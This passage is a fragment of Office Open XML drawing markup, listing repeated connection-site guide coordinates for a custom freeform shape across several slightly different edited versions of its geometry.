              <a:gd name="connsiteY18" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY33" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY34" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY35" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY36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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 18269 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 6928626 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY33" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY34" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY35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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY33" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY34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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY33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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY32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1919 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 7915797 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4127114"/>
              <a:gd name="connsiteY0" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 6738 w 4127114"/>
              <a:gd name="connsiteY1" fmla="*/ 7873197 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 3577 w 4127114"/>
              <a:gd name="connsiteY2" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 11720 w 4127114"/>
              <a:gd name="connsiteY3" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 19223 w 4127114"/>
              <a:gd name="connsiteY4" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 27219 w 4127114"/>
              <a:gd name="connsiteY5" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY6" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY7" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 26931 w 4127114"/>
              <a:gd name="connsiteY8" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY9" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 25940 w 4127114"/>
              <a:gd name="connsiteY10" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY11" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 21057 w 4127114"/>
              <a:gd name="connsiteY12" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 46300 w 4127114"/>
              <a:gd name="connsiteY13" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 67155 w 4127114"/>
              <a:gd name="connsiteY14" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4089397 w 4127114"/>
              <a:gd name="connsiteY15" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4122924 w 4127114"/>
              <a:gd name="connsiteY16" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4122923 w 4127114"/>
              <a:gd name="connsiteY17" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4089396 w 4127114"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4071889 w 4127114"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4071889 w 4127114"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 67141 w 4127114"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY22" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY23" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 19124 w 4127114"/>
              <a:gd name="connsiteY24" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY25" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY26" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY27" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 18430 w 4127114"/>
              <a:gd name="connsiteY28" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 5552 w 4127114"/>
              <a:gd name="connsiteY29" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 0 w 4127114"/>
              <a:gd name="connsiteY30" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 2074 w 4123636"/>
              <a:gd name="connsiteY0" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 3260 w 4123636"/>
              <a:gd name="connsiteY1" fmla="*/ 7873197 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 99 w 4123636"/>
              <a:gd name="connsiteY2" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 8242 w 4123636"/>
              <a:gd name="connsiteY3" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 15745 w 4123636"/>
              <a:gd name="connsiteY4" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 23741 w 4123636"/>
              <a:gd name="connsiteY5" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY6" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY7" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 23453 w 4123636"/>
              <a:gd name="connsiteY8" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY9" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 22462 w 4123636"/>
              <a:gd name="connsiteY10" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY11" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 17579 w 4123636"/>
              <a:gd name="connsiteY12" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 42822 w 4123636"/>
              <a:gd name="connsiteY13" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 63677 w 4123636"/>
              <a:gd name="connsiteY14" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4085919 w 4123636"/>
              <a:gd name="connsiteY15" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4119446 w 4123636"/>
              <a:gd name="connsiteY16" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4119445 w 4123636"/>
              <a:gd name="connsiteY17" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4085918 w 4123636"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4068411 w 4123636"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4068411 w 4123636"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 63663 w 4123636"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY22" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY23" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 15646 w 4123636"/>
              <a:gd name="connsiteY24" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY25" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY26" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY27" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 14952 w 4123636"/>
              <a:gd name="connsiteY28" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 2074 w 4123636"/>
              <a:gd name="connsiteY29" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 2471 w 4124033"/>
              <a:gd name="connsiteY0" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 496 w 4124033"/>
              <a:gd name="connsiteY1" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 8639 w 4124033"/>
              <a:gd name="connsiteY2" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 16142 w 4124033"/>
              <a:gd name="connsiteY3" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 24138 w 4124033"/>
              <a:gd name="connsiteY4" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY5" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY6" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 23850 w 4124033"/>
              <a:gd name="connsiteY7" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY8" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 22859 w 4124033"/>
              <a:gd name="connsiteY9" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY10" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 17976 w 4124033"/>
              <a:gd name="connsiteY11" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 43219 w 4124033"/>
              <a:gd name="connsiteY12" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 64074 w 4124033"/>
              <a:gd name="connsiteY13" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4086316 w 4124033"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4119843 w 4124033"/>
              <a:gd name="connsiteY15" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4119842 w 4124033"/>
              <a:gd name="connsiteY16" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4086315 w 4124033"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4068808 w 4124033"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4068808 w 4124033"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 64060 w 4124033"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY21" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY22" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 16043 w 4124033"/>
              <a:gd name="connsiteY23" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY24" fmla="*/ 8936768 h 10695515"/>
